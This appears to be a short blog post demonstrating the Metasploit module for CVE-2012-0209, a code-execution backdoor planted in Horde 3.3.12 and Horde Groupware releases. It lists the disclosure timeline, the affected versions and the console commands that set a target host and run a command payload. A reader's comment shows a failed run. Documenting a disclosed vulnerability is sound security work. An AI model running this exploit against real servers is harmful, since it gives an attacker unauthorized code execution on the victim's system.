CVE-2012-0209 Horde 3.3.12 Backdoor Metasploit Demo

Timeline :

Public release of the vulnerability the 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang the 2012-02-15
Metasploit PoC provided the jduck 2012-02-16

PoC provided by :

Eric Romang
jduck

Reference(s) :

CVE-2012-0209

Affected version(s) :

Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7

Tested on Ubuntu 11.10 with :

Horde 3.3.12

Description :

This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.

Commands :

use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set RHOST 192.168.178.100
set PAYLOAD cmd/unix/generic 
set CMD uname -a
exploit

1 thought on “CVE-2012-0209 Horde 3.3.12 Backdoor Metasploit Demo

  1. msf exploit(horde) > set CMD uname -a
    CMD => uname -a
    msf exploit(horde) > exploit

    [*] The server returned: 200 OK
    [-] No response found
    [*] Exploit completed, but no session was created.
    msf exploit(horde) >

    [-] No response found???

Comments are closed.